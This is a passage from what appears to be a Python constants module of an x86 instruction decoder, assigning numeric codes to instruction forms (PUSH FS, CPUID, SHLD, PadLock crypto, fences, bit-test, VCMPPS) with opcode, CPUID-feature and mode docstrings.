``KORTESTW k1, k2``
``VEX.L0.0F.W0 98 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KORTESTQ_KR_KR: int = 1935
"""
``KORTESTQ k1, k2``
``VEX.L0.0F.W1 98 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KORTESTB_KR_KR: int = 1936
"""
``KORTESTB k1, k2``
``VEX.L0.66.0F.W0 98 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KORTESTD_KR_KR: int = 1937
"""
``KORTESTD k1, k2``
``VEX.L0.66.0F.W1 98 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KTESTW_KR_KR: int = 1938
"""
``KTESTW k1, k2``
``VEX.L0.0F.W0 99 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KTESTQ_KR_KR: int = 1939
"""
``KTESTQ k1, k2``
``VEX.L0.0F.W1 99 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KTESTB_KR_KR: int = 1940
"""
``KTESTB k1, k2``
``VEX.L0.66.0F.W0 99 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KTESTD_KR_KR: int = 1941
"""
``KTESTD k1, k2``
``VEX.L0.66.0F.W1 99 /r``
``AVX512BW``
``16/32/64-bit``
"""
PUSHW_FS: int = 1942
"""
``PUSH FS``
``o16 0F A0``
``386+``
``16/32/64-bit``
"""
PUSHD_FS: int = 1943
"""
``PUSH FS``
``o32 0F A0``
``386+``
``16/32-bit``
"""
PUSHQ_FS: int = 1944
"""
``PUSH FS``
``o64 0F A0``
``X64``
``64-bit``
"""
POPW_FS: int = 1945
"""
``POP FS``
``o16 0F A1``
``386+``
``16/32/64-bit``
"""
POPD_FS: int = 1946
"""
``POP FS``
``o32 0F A1``
``386+``
``16/32-bit``
"""
POPQ_FS: int = 1947
"""
``POP FS``
``o64 0F A1``
``X64``
``64-bit``
"""
CPUID: int = 1948
"""
``CPUID``
``0F A2``
``CPUID``
``16/32/64-bit``
"""
BT_RM16_R16: int = 1949
"""
``BT r/m16, r16``
``o16 0F A3 /r``
``386+``
``16/32/64-bit``
"""
BT_RM32_R32: int = 1950
"""
``BT r/m32, r32``
``o32 0F A3 /r``
``386+``
``16/32/64-bit``
"""
BT_RM64_R64: int = 1951
"""
``BT r/m64, r64``
``o64 0F A3 /r``
``X64``
``64-bit``
"""
SHLD_RM16_R16_IMM8: int = 1952
"""
``SHLD r/m16, r16, imm8``
``o16 0F A4 /r ib``
``386+``
``16/32/64-bit``
"""
SHLD_RM32_R32_IMM8: int = 1953
"""
``SHLD r/m32, r32, imm8``
``o32 0F A4 /r ib``
``386+``
``16/32/64-bit``
"""
SHLD_RM64_R64_IMM8: int = 1954
"""
``SHLD r/m64, r64, imm8``
``o64 0F A4 /r ib``
``X64``
``64-bit``
"""
SHLD_RM16_R16_CL: int = 1955
"""
``SHLD r/m16, r16, CL``
``o16 0F A5 /r``
``386+``
``16/32/64-bit``
"""
SHLD_RM32_R32_CL: int = 1956
"""
``SHLD r/m32, r32, CL``
``o32 0F A5 /r``
``386+``
``16/32/64-bit``
"""
SHLD_RM64_R64_CL: int = 1957
"""
``SHLD r/m64, r64, CL``
``o64 0F A5 /r``
``X64``
``64-bit``
"""
MONTMUL_16: int = 1958
"""
``MONTMUL``
``a16 F3 0F A6 C0``
``PADLOCK_PMM``
``16/32-bit``
"""
MONTMUL_32: int = 1959
"""
``MONTMUL``
``a32 F3 0F A6 C0``
``PADLOCK_PMM``
``16/32/64-bit``
"""
MONTMUL_64: int = 1960
"""
``MONTMUL``
``a64 F3 0F A6 C0``
``PADLOCK_PMM``
``64-bit``
"""
XSHA1_16: int = 1961
"""
``XSHA1``
``a16 F3 0F A6 C8``
``PADLOCK_PHE``
``16/32-bit``
"""
XSHA1_32: int = 1962
"""
``XSHA1``
``a32 F3 0F A6 C8``
``PADLOCK_PHE``
``16/32/64-bit``
"""
XSHA1_64: int = 1963
"""
``XSHA1``
``a64 F3 0F A6 C8``
``PADLOCK_PHE``
``64-bit``
"""
XSHA256_16: int = 1964
"""
``XSHA256``
``a16 F3 0F A6 D0``
``PADLOCK_PHE``
``16/32-bit``
"""
XSHA256_32: int = 1965
"""
``XSHA256``
``a32 F3 0F A6 D0``
``PADLOCK_PHE``
``16/32/64-bit``
"""
XSHA256_64: int = 1966
"""
``XSHA256``
``a64 F3 0F A6 D0``
``PADLOCK_PHE``
``64-bit``
"""
XBTS_R16_RM16: int = 1967
"""
``XBTS r16, r/m16``
``o16 0F A6 /r``
``386 A0``
``16/32-bit``
"""
XBTS_R32_RM32: int = 1968
"""
``XBTS r32, r/m32``
``o32 0F A6 /r``
``386 A0``
``16/32-bit``
"""
XSTORE_16: int = 1969
"""
``XSTORE``
``a16 0F A7 C0``
``PADLOCK_RNG``
``16/32-bit``
"""
XSTORE_32: int = 1970
"""
``XSTORE``
``a32 0F A7 C0``
``PADLOCK_RNG``
``16/32/64-bit``
"""
XSTORE_64: int = 1971
"""
``XSTORE``
``a64 0F A7 C0``
``PADLOCK_RNG``
``64-bit``
"""
XCRYPTECB_16: int = 1972
"""
``XCRYPTECB``
``a16 F3 0F A7 C8``
``PADLOCK_ACE``
``16/32-bit``
"""
XCRYPTECB_32: int = 1973
"""
``XCRYPTECB``
``a32 F3 0F A7 C8``
``PADLOCK_ACE``
``16/32/64-bit``
"""
XCRYPTECB_64: int = 1974
"""
``XCRYPTECB``
``a64 F3 0F A7 C8``
``PADLOCK_ACE``
``64-bit``
"""
XCRYPTCBC_16: int = 1975
"""
``XCRYPTCBC``
``a16 F3 0F A7 D0``
``PADLOCK_ACE``
``16/32-bit``
"""
XCRYPTCBC_32: int = 1976
"""
``XCRYPTCBC``
``a32 F3 0F A7 D0``
``PADLOCK_ACE``
``16/32/64-bit``
"""
XCRYPTCBC_64: int = 1977
"""
``XCRYPTCBC``
``a64 F3 0F A7 D0``
``PADLOCK_ACE``
``64-bit``
"""
XCRYPTCTR_16: int = 1978
"""
``XCRYPTCTR``
``a16 F3 0F A7 D8``
``PADLOCK_ACE``
``16/32-bit``
"""
XCRYPTCTR_32: int = 1979
"""
``XCRYPTCTR``
``a32 F3 0F A7 D8``
``PADLOCK_ACE``
``16/32/64-bit``
"""
XCRYPTCTR_64: int = 1980
"""
``XCRYPTCTR``
``a64 F3 0F A7 D8``
``PADLOCK_ACE``
``64-bit``
"""
XCRYPTCFB_16: int = 1981
"""
``XCRYPTCFB``
``a16 F3 0F A7 E0``
``PADLOCK_ACE``
``16/32-bit``
"""
XCRYPTCFB_32: int = 1982
"""
``XCRYPTCFB``
``a32 F3 0F A7 E0``
``PADLOCK_ACE``
``16/32/64-bit``
"""
XCRYPTCFB_64: int = 1983
"""
``XCRYPTCFB``
``a64 F3 0F A7 E0``
``PADLOCK_ACE``
``64-bit``
"""
XCRYPTOFB_16: int = 1984
"""
``XCRYPTOFB``
``a16 F3 0F A7 E8``
``PADLOCK_ACE``
``16/32-bit``
"""
XCRYPTOFB_32: int = 1985
"""
``XCRYPTOFB``
``a32 F3 0F A7 E8``
``PADLOCK_ACE``
``16/32/64-bit``
"""
XCRYPTOFB_64: int = 1986
"""
``XCRYPTOFB``
``a64 F3 0F A7 E8``
``PADLOCK_ACE``
``64-bit``
"""
IBTS_RM16_R16: int = 1987
"""
``IBTS r/m16, r16``
``o16 0F A7 /r``
``386 A0``
``16/32-bit``
"""
IBTS_RM32_R32: int = 1988
"""
``IBTS r/m32, r32``
``o32 0F A7 /r``
``386 A0``
``16/32-bit``
"""
CMPXCHG486_RM8_R8: int = 1989
"""
``CMPXCHG r/m8, r8``
``0F A6 /r``
``486 A``
``16/32-bit``
"""
CMPXCHG486_RM16_R16: int = 1990
"""
``CMPXCHG r/m16, r16``
``o16 0F A7 /r``
``486 A``
``16/32-bit``
"""
CMPXCHG486_RM32_R32: int = 1991
"""
``CMPXCHG r/m32, r32``
``o32 0F A7 /r``
``486 A``
``16/32-bit``
"""
PUSHW_GS: int = 1992
"""
``PUSH GS``
``o16 0F A8``
``386+``
``16/32/64-bit``
"""
PUSHD_GS: int = 1993
"""
``PUSH GS``
``o32 0F A8``
``386+``
``16/32-bit``
"""
PUSHQ_GS: int = 1994
"""
``PUSH GS``
``o64 0F A8``
``X64``
``64-bit``
"""
POPW_GS: int = 1995
"""
``POP GS``
``o16 0F A9``
``386+``
``16/32/64-bit``
"""
POPD_GS: int = 1996
"""
``POP GS``
``o32 0F A9``
``386+``
``16/32-bit``
"""
POPQ_GS: int = 1997
"""
``POP GS``
``o64 0F A9``
``X64``
``64-bit``
"""
RSM: int = 1998
"""
``RSM``
``0F AA``
``386+``
``16/32/64-bit``
"""
BTS_RM16_R16: int = 1999
"""
``BTS r/m16, r16``
``o16 0F AB /r``
``386+``
``16/32/64-bit``
"""
BTS_RM32_R32: int = 2000
"""
``BTS r/m32, r32``
``o32 0F AB /r``
``386+``
``16/32/64-bit``
"""
BTS_RM64_R64: int = 2001
"""
``BTS r/m64, r64``
``o64 0F AB /r``
``X64``
``64-bit``
"""
SHRD_RM16_R16_IMM8: int = 2002
"""
``SHRD r/m16, r16, imm8``
``o16 0F AC /r ib``
``386+``
``16/32/64-bit``
"""
SHRD_RM32_R32_IMM8: int = 2003
"""
``SHRD r/m32, r32, imm8``
``o32 0F AC /r ib``
``386+``
``16/32/64-bit``
"""
SHRD_RM64_R64_IMM8: int = 2004
"""
``SHRD r/m64, r64, imm8``
``o64 0F AC /r ib``
``X64``
``64-bit``
"""
SHRD_RM16_R16_CL: int = 2005
"""
``SHRD r/m16, r16, CL``
``o16 0F AD /r``
``386+``
``16/32/64-bit``
"""
SHRD_RM32_R32_CL: int = 2006
"""
``SHRD r/m32, r32, CL``
``o32 0F AD /r``
``386+``
``16/32/64-bit``
"""
SHRD_RM64_R64_CL: int = 2007
"""
``SHRD r/m64, r64, CL``
``o64 0F AD /r``
``X64``
``64-bit``
"""
FXSAVE_M512BYTE: int = 2008
"""
``FXSAVE m512byte``
``NP 0F AE /0``
``FXSR``
``16/32/64-bit``
"""
FXSAVE64_M512BYTE: int = 2009
"""
``FXSAVE64 m512byte``
``NP o64 0F AE /0``
``FXSR``
``64-bit``
"""
RDFSBASE_R32: int = 2010
"""
``RDFSBASE r32``
``F3 0F AE /0``
``FSGSBASE``
``64-bit``
"""
RDFSBASE_R64: int = 2011
"""
``RDFSBASE r64``
``F3 o64 0F AE /0``
``FSGSBASE``
``64-bit``
"""
FXRSTOR_M512BYTE: int = 2012
"""
``FXRSTOR m512byte``
``NP 0F AE /1``
``FXSR``
``16/32/64-bit``
"""
FXRSTOR64_M512BYTE: int = 2013
"""
``FXRSTOR64 m512byte``
``NP o64 0F AE /1``
``FXSR``
``64-bit``
"""
RDGSBASE_R32: int = 2014
"""
``RDGSBASE r32``
``F3 0F AE /1``
``FSGSBASE``
``64-bit``
"""
RDGSBASE_R64: int = 2015
"""
``RDGSBASE r64``
``F3 o64 0F AE /1``
``FSGSBASE``
``64-bit``
"""
LDMXCSR_M32: int = 2016
"""
``LDMXCSR m32``
``NP 0F AE /2``
``SSE``
``16/32/64-bit``
"""
WRFSBASE_R32: int = 2017
"""
``WRFSBASE r32``
``F3 0F AE /2``
``FSGSBASE``
``64-bit``
"""
WRFSBASE_R64: int = 2018
"""
``WRFSBASE r64``
``F3 o64 0F AE /2``
``FSGSBASE``
``64-bit``
"""
VEX_VLDMXCSR_M32: int = 2019
"""
``VLDMXCSR m32``
``VEX.LZ.0F.WIG AE /2``
``AVX``
``16/32/64-bit``
"""
STMXCSR_M32: int = 2020
"""
``STMXCSR m32``
``NP 0F AE /3``
``SSE``
``16/32/64-bit``
"""
WRGSBASE_R32: int = 2021
"""
``WRGSBASE r32``
``F3 0F AE /3``
``FSGSBASE``
``64-bit``
"""
WRGSBASE_R64: int = 2022
"""
``WRGSBASE r64``
``F3 o64 0F AE /3``
``FSGSBASE``
``64-bit``
"""
VEX_VSTMXCSR_M32: int = 2023
"""
``VSTMXCSR m32``
``VEX.LZ.0F.WIG AE /3``
``AVX``
``16/32/64-bit``
"""
XSAVE_MEM: int = 2024
"""
``XSAVE mem``
``NP 0F AE /4``
``XSAVE``
``16/32/64-bit``
"""
XSAVE64_MEM: int = 2025
"""
``XSAVE64 mem``
``NP o64 0F AE /4``
``XSAVE``
``64-bit``
"""
PTWRITE_RM32: int = 2026
"""
``PTWRITE r/m32``
``F3 0F AE /4``
``PTWRITE``
``16/32/64-bit``
"""
PTWRITE_RM64: int = 2027
"""
``PTWRITE r/m64``
``F3 o64 0F AE /4``
``PTWRITE``
``64-bit``
"""
XRSTOR_MEM: int = 2028
"""
``XRSTOR mem``
``NP 0F AE /5``
``XSAVE``
``16/32/64-bit``
"""
XRSTOR64_MEM: int = 2029
"""
``XRSTOR64 mem``
``NP o64 0F AE /5``
``XSAVE``
``64-bit``
"""
INCSSPD_R32: int = 2030
"""
``INCSSPD r32``
``F3 0F AE /5``
``CET_SS``
``16/32/64-bit``
"""
INCSSPQ_R64: int = 2031
"""
``INCSSPQ r64``
``F3 o64 0F AE /5``
``CET_SS``
``64-bit``
"""
XSAVEOPT_MEM: int = 2032
"""
``XSAVEOPT mem``
``NP 0F AE /6``
``XSAVEOPT``
``16/32/64-bit``
"""
XSAVEOPT64_MEM: int = 2033
"""
``XSAVEOPT64 mem``
``NP o64 0F AE /6``
``XSAVEOPT``
``64-bit``
"""
CLWB_M8: int = 2034
"""
``CLWB m8``
``66 0F AE /6``
``CLWB``
``16/32/64-bit``
"""
TPAUSE_R32: int = 2035
"""
``TPAUSE r32, <edx>, <eax>``
``66 0F AE /6``
``WAITPKG``
``16/32/64-bit``
"""
TPAUSE_R64: int = 2036
"""
``TPAUSE r64, <edx>, <eax>``
``66 o64 0F AE /6``
``WAITPKG``
``64-bit``
"""
CLRSSBSY_M64: int = 2037
"""
``CLRSSBSY m64``
``F3 0F AE /6``
``CET_SS``
``16/32/64-bit``
"""
UMONITOR_R16: int = 2038
"""
``UMONITOR r16``
``a16 F3 0F AE /6``
``WAITPKG``
``16/32-bit``
"""
UMONITOR_R32: int = 2039
"""
``UMONITOR r32``
``a32 F3 0F AE /6``
``WAITPKG``
``16/32/64-bit``
"""
UMONITOR_R64: int = 2040
"""
``UMONITOR r64``
``a64 F3 0F AE /6``
``WAITPKG``
``64-bit``
"""
UMWAIT_R32: int = 2041
"""
``UMWAIT r32, <edx>, <eax>``
``F2 0F AE /6``
``WAITPKG``
``16/32/64-bit``
"""
UMWAIT_R64: int = 2042
"""
``UMWAIT r64, <edx>, <eax>``
``F2 o64 0F AE /6``
``WAITPKG``
``64-bit``
"""
CLFLUSH_M8: int = 2043
"""
``CLFLUSH m8``
``NP 0F AE /7``
``CLFSH``
``16/32/64-bit``
"""
CLFLUSHOPT_M8: int = 2044
"""
``CLFLUSHOPT m8``
``66 0F AE /7``
``CLFLUSHOPT``
``16/32/64-bit``
"""
LFENCE: int = 2045
"""
``LFENCE``
``NP 0F AE E8``
``SSE2``
``16/32/64-bit``
"""
LFENCE_E9: int = 2046
"""
``LFENCE``
``NP 0F AE E9``
``SSE2``
``16/32/64-bit``
"""
LFENCE_EA: int = 2047
"""
``LFENCE``
``NP 0F AE EA``
``SSE2``
``16/32/64-bit``
"""
LFENCE_EB: int = 2048
"""
``LFENCE``
``NP 0F AE EB``
``SSE2``
``16/32/64-bit``
"""
LFENCE_EC: int = 2049
"""
``LFENCE``
``NP 0F AE EC``
``SSE2``
``16/32/64-bit``
"""
LFENCE_ED: int = 2050
"""
``LFENCE``
``NP 0F AE ED``
``SSE2``
``16/32/64-bit``
"""
LFENCE_EE: int = 2051
"""
``LFENCE``
``NP 0F AE EE``
``SSE2``
``16/32/64-bit``
"""
LFENCE_EF: int = 2052
"""
``LFENCE``
``NP 0F AE EF``
``SSE2``
``16/32/64-bit``
"""
MFENCE: int = 2053
"""
``MFENCE``
``NP 0F AE F0``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F1: int = 2054
"""
``MFENCE``
``NP 0F AE F1``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F2: int = 2055
"""
``MFENCE``
``NP 0F AE F2``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F3: int = 2056
"""
``MFENCE``
``NP 0F AE F3``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F4: int = 2057
"""
``MFENCE``
``NP 0F AE F4``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F5: int = 2058
"""
``MFENCE``
``NP 0F AE F5``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F6: int = 2059
"""
``MFENCE``
``NP 0F AE F6``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F7: int = 2060
"""
``MFENCE``
``NP 0F AE F7``
``SSE2``
``16/32/64-bit``
"""
SFENCE: int = 2061
"""
``SFENCE``
``NP 0F AE F8``
``SSE``
``16/32/64-bit``
"""
SFENCE_F9: int = 2062
"""
``SFENCE``
``NP 0F AE F9``
``SSE``
``16/32/64-bit``
"""
SFENCE_FA: int = 2063
"""
``SFENCE``
``NP 0F AE FA``
``SSE``
``16/32/64-bit``
"""
SFENCE_FB: int = 2064
"""
``SFENCE``
``NP 0F AE FB``
``SSE``
``16/32/64-bit``
"""
SFENCE_FC: int = 2065
"""
``SFENCE``
``NP 0F AE FC``
``SSE``
``16/32/64-bit``
"""
SFENCE_FD: int = 2066
"""
``SFENCE``
``NP 0F AE FD``
``SSE``
``16/32/64-bit``
"""
SFENCE_FE: int = 2067
"""
``SFENCE``
``NP 0F AE FE``
``SSE``
``16/32/64-bit``
"""
SFENCE_FF: int = 2068
"""
``SFENCE``
``NP 0F AE FF``
``SSE``
``16/32/64-bit``
"""
PCOMMIT: int = 2069
"""
``PCOMMIT``
``66 0F AE F8``
``PCOMMIT``
``16/32/64-bit``
"""
IMUL_R16_RM16: int = 2070
"""
``IMUL r16, r/m16``
``o16 0F AF /r``
``386+``
``16/32/64-bit``
"""
IMUL_R32_RM32: int = 2071
"""
``IMUL r32, r/m32``
``o32 0F AF /r``
``386+``
``16/32/64-bit``
"""
IMUL_R64_RM64: int = 2072
"""
``IMUL r64, r/m64``
``o64 0F AF /r``
``X64``
``64-bit``
"""
CMPXCHG_RM8_R8: int = 2073
"""
``CMPXCHG r/m8, r8``
``0F B0 /r``
``486+``
``16/32/64-bit``
"""
CMPXCHG_RM16_R16: int = 2074
"""
``CMPXCHG r/m16, r16``
``o16 0F B1 /r``
``486+``
``16/32/64-bit``
"""
CMPXCHG_RM32_R32: int = 2075
"""
``CMPXCHG r/m32, r32``
``o32 0F B1 /r``
``486+``
``16/32/64-bit``
"""
CMPXCHG_RM64_R64: int = 2076
"""
``CMPXCHG r/m64, r64``
``o64 0F B1 /r``
``X64``
``64-bit``
"""
LSS_R16_M1616: int = 2077
"""
``LSS r16, m16:16``
``o16 0F B2 /r``
``386+``
``16/32/64-bit``
"""
LSS_R32_M1632: int = 2078
"""
``LSS r32, m16:32``
``o32 0F B2 /r``
``386+``
``16/32/64-bit``
"""
LSS_R64_M1664: int = 2079
"""
``LSS r64, m16:64``
``o64 0F B2 /r``
``X64``
``64-bit``
"""
BTR_RM16_R16: int = 2080
"""
``BTR r/m16, r16``
``o16 0F B3 /r``
``386+``
``16/32/64-bit``
"""
BTR_RM32_R32: int = 2081
"""
``BTR r/m32, r32``
``o32 0F B3 /r``
``386+``
``16/32/64-bit``
"""
BTR_RM64_R64: int = 2082
"""
``BTR r/m64, r64``
``o64 0F B3 /r``
``X64``
``64-bit``
"""
LFS_R16_M1616: int = 2083
"""
``LFS r16, m16:16``
``o16 0F B4 /r``
``386+``
``16/32/64-bit``
"""
LFS_R32_M1632: int = 2084
"""
``LFS r32, m16:32``
``o32 0F B4 /r``
``386+``
``16/32/64-bit``
"""
LFS_R64_M1664: int = 2085
"""
``LFS r64, m16:64``
``o64 0F B4 /r``
``X64``
``64-bit``
"""
LGS_R16_M1616: int = 2086
"""
``LGS r16, m16:16``
``o16 0F B5 /r``
``386+``
``16/32/64-bit``
"""
LGS_R32_M1632: int = 2087
"""
``LGS r32, m16:32``
``o32 0F B5 /r``
``386+``
``16/32/64-bit``
"""
LGS_R64_M1664: int = 2088
"""
``LGS r64, m16:64``
``o64 0F B5 /r``
``X64``
``64-bit``
"""
MOVZX_R16_RM8: int = 2089
"""
``MOVZX r16, r/m8``
``o16 0F B6 /r``
``386+``
``16/32/64-bit``
"""
MOVZX_R32_RM8: int = 2090
"""
``MOVZX r32, r/m8``
``o32 0F B6 /r``
``386+``
``16/32/64-bit``
"""
MOVZX_R64_RM8: int = 2091
"""
``MOVZX r64, r/m8``
``o64 0F B6 /r``
``X64``
``64-bit``
"""
MOVZX_R16_RM16: int = 2092
"""
``MOVZX r16, r/m16``
``o16 0F B7 /r``
``386+``
``16/32/64-bit``
"""
MOVZX_R32_RM16: int = 2093
"""
``MOVZX r32, r/m16``
``o32 0F B7 /r``
``386+``
``16/32/64-bit``
"""
MOVZX_R64_RM16: int = 2094
"""
``MOVZX r64, r/m16``
``o64 0F B7 /r``
``X64``
``64-bit``
"""
JMPE_DISP16: int = 2095
"""
``JMPE disp16``
``o16 0F B8 cw``
``IA-64``
``16/32-bit``
"""
JMPE_DISP32: int = 2096
"""
``JMPE disp32``
``o32 0F B8 cd``
``IA-64``
``16/32-bit``
"""
POPCNT_R16_RM16: int = 2097
"""
``POPCNT r16, r/m16``
``o16 F3 0F B8 /r``
``POPCNT``
``16/32/64-bit``
"""
POPCNT_R32_RM32: int = 2098
"""
``POPCNT r32, r/m32``
``o32 F3 0F B8 /r``
``POPCNT``
``16/32/64-bit``
"""
POPCNT_R64_RM64: int = 2099
"""
``POPCNT r64, r/m64``
``F3 o64 0F B8 /r``
``POPCNT``
``64-bit``
"""
UD1_R16_RM16: int = 2100
"""
``UD1 r16, r/m16``
``o16 0F B9 /r``
``286+``
``16/32/64-bit``
"""
UD1_R32_RM32: int = 2101
"""
``UD1 r32, r/m32``
``o32 0F B9 /r``
``386+``
``16/32/64-bit``
"""
UD1_R64_RM64: int = 2102
"""
``UD1 r64, r/m64``
``o64 0F B9 /r``
``X64``
``64-bit``
"""
BT_RM16_IMM8: int = 2103
"""
``BT r/m16, imm8``
``o16 0F BA /4 ib``
``386+``
``16/32/64-bit``
"""
BT_RM32_IMM8: int = 2104
"""
``BT r/m32, imm8``
``o32 0F BA /4 ib``
``386+``
``16/32/64-bit``
"""
BT_RM64_IMM8: int = 2105
"""
``BT r/m64, imm8``
``o64 0F BA /4 ib``
``X64``
``64-bit``
"""
BTS_RM16_IMM8: int = 2106
"""
``BTS r/m16, imm8``
``o16 0F BA /5 ib``
``386+``
``16/32/64-bit``
"""
BTS_RM32_IMM8: int = 2107
"""
``BTS r/m32, imm8``
``o32 0F BA /5 ib``
``386+``
``16/32/64-bit``
"""
BTS_RM64_IMM8: int = 2108
"""
``BTS r/m64, imm8``
``o64 0F BA /5 ib``
``X64``
``64-bit``
"""
BTR_RM16_IMM8: int = 2109
"""
``BTR r/m16, imm8``
``o16 0F BA /6 ib``
``386+``
``16/32/64-bit``
"""
BTR_RM32_IMM8: int = 2110
"""
``BTR r/m32, imm8``
``o32 0F BA /6 ib``
``386+``
``16/32/64-bit``
"""
BTR_RM64_IMM8: int = 2111
"""
``BTR r/m64, imm8``
``o64 0F BA /6 ib``
``X64``
``64-bit``
"""
BTC_RM16_IMM8: int = 2112
"""
``BTC r/m16, imm8``
``o16 0F BA /7 ib``
``386+``
``16/32/64-bit``
"""
BTC_RM32_IMM8: int = 2113
"""
``BTC r/m32, imm8``
``o32 0F BA /7 ib``
``386+``
``16/32/64-bit``
"""
BTC_RM64_IMM8: int = 2114
"""
``BTC r/m64, imm8``
``o64 0F BA /7 ib``
``X64``
``64-bit``
"""
BTC_RM16_R16: int = 2115
"""
``BTC r/m16, r16``
``o16 0F BB /r``
``386+``
``16/32/64-bit``
"""
BTC_RM32_R32: int = 2116
"""
``BTC r/m32, r32``
``o32 0F BB /r``
``386+``
``16/32/64-bit``
"""
BTC_RM64_R64: int = 2117
"""
``BTC r/m64, r64``
``o64 0F BB /r``
``X64``
``64-bit``
"""
BSF_R16_RM16: int = 2118
"""
``BSF r16, r/m16``
``o16 0F BC /r``
``386+``
``16/32/64-bit``
"""
BSF_R32_RM32: int = 2119
"""
``BSF r32, r/m32``
``o32 0F BC /r``
``386+``
``16/32/64-bit``
"""
BSF_R64_RM64: int = 2120
"""
``BSF r64, r/m64``
``o64 0F BC /r``
``X64``
``64-bit``
"""
TZCNT_R16_RM16: int = 2121
"""
``TZCNT r16, r/m16``
``o16 F3 0F BC /r``
``BMI1``
``16/32/64-bit``
"""
TZCNT_R32_RM32: int = 2122
"""
``TZCNT r32, r/m32``
``o32 F3 0F BC /r``
``BMI1``
``16/32/64-bit``
"""
TZCNT_R64_RM64: int = 2123
"""
``TZCNT r64, r/m64``
``F3 o64 0F BC /r``
``BMI1``
``64-bit``
"""
BSR_R16_RM16: int = 2124
"""
``BSR r16, r/m16``
``o16 0F BD /r``
``386+``
``16/32/64-bit``
"""
BSR_R32_RM32: int = 2125
"""
``BSR r32, r/m32``
``o32 0F BD /r``
``386+``
``16/32/64-bit``
"""
BSR_R64_RM64: int = 2126
"""
``BSR r64, r/m64``
``o64 0F BD /r``
``X64``
``64-bit``
"""
LZCNT_R16_RM16: int = 2127
"""
``LZCNT r16, r/m16``
``o16 F3 0F BD /r``
``LZCNT``
``16/32/64-bit``
"""
LZCNT_R32_RM32: int = 2128
"""
``LZCNT r32, r/m32``
``o32 F3 0F BD /r``
``LZCNT``
``16/32/64-bit``
"""
LZCNT_R64_RM64: int = 2129
"""
``LZCNT r64, r/m64``
``F3 o64 0F BD /r``
``LZCNT``
``64-bit``
"""
MOVSX_R16_RM8: int = 2130
"""
``MOVSX r16, r/m8``
``o16 0F BE /r``
``386+``
``16/32/64-bit``
"""
MOVSX_R32_RM8: int = 2131
"""
``MOVSX r32, r/m8``
``o32 0F BE /r``
``386+``
``16/32/64-bit``
"""
MOVSX_R64_RM8: int = 2132
"""
``MOVSX r64, r/m8``
``o64 0F BE /r``
``X64``
``64-bit``
"""
MOVSX_R16_RM16: int = 2133
"""
``MOVSX r16, r/m16``
``o16 0F BF /r``
``386+``
``16/32/64-bit``
"""
MOVSX_R32_RM16: int = 2134
"""
``MOVSX r32, r/m16``
``o32 0F BF /r``
``386+``
``16/32/64-bit``
"""
MOVSX_R64_RM16: int = 2135
"""
``MOVSX r64, r/m16``
``o64 0F BF /r``
``X64``
``64-bit``
"""
XADD_RM8_R8: int = 2136
"""
``XADD r/m8, r8``
``0F C0 /r``
``486+``
``16/32/64-bit``
"""
XADD_RM16_R16: int = 2137
"""
``XADD r/m16, r16``
``o16 0F C1 /r``
``486+``
``16/32/64-bit``
"""
XADD_RM32_R32: int = 2138
"""
``XADD r/m32, r32``
``o32 0F C1 /r``
``486+``
``16/32/64-bit``
"""
XADD_RM64_R64: int = 2139
"""
``XADD r/m64, r64``
``o64 0F C1 /r``
``X64``
``64-bit``
"""
CMPPS_XMM_XMMM128_IMM8: int = 2140
"""
``CMPPS xmm1, xmm2/m128, imm8``
``NP 0F C2 /r ib``
``SSE``
``16/32/64-bit``
"""
VEX_VCMPPS_XMM_XMM_XMMM128_IMM8: int = 2141
"""
``VCMPPS xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.0F.WIG C2 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VCMPPS_YMM_YMM_YMMM256_IMM8: int = 2142
"""
``VCMPPS ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.0F.WIG C2 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VCMPPS_KR_K1_XMM_XMMM128B32_IMM8: int = 2143
"""
``VCMPPS k1 {k2}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.0F.W0 C2 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCMPPS_KR_K1_YMM_YMMM256B32_IMM8: int = 2144
"""
``VCMPPS k1 {k2}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.0F.W0 C2 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCMPPS_KR_K1_ZMM_ZMMM512B32_IMM8_SAE: int = 2145
"""
``VCMPPS k1 {k2}, zmm2, zmm3/m512/m32bcst{sae}, imm8``
``EVEX.512.0F.W0 C2 /r ib``
``AVX512F``
``16/32/64-bit``
"""
CMPPD_XMM_XMMM128_IMM8: int = 2146
"""
``CMPPD xmm1, xmm2/m128, imm8``
``66 0F C2 /r ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VCMPPD_XMM_XMM_XMMM128_IMM8: int = 2147
"""
``VCMPPD xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F.WIG C2 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VCMPPD_YMM_YMM_YMMM256_IMM8: int = 2148
"""
``VCMPPD ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F.WIG C2 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VCMPPD_KR_K1_XMM_XMMM128B64_IMM8: int = 2149
"""
``VCMPPD k1 {k2}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 C2 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCMPPD_KR_K1_YMM_YMMM256B64_IMM8: int = 2150
"""
``VCMPPD k1 {k2}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 C2 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCMPPD_KR_K1_ZMM_ZMMM512B64_IMM8_SAE: int = 2151
"""
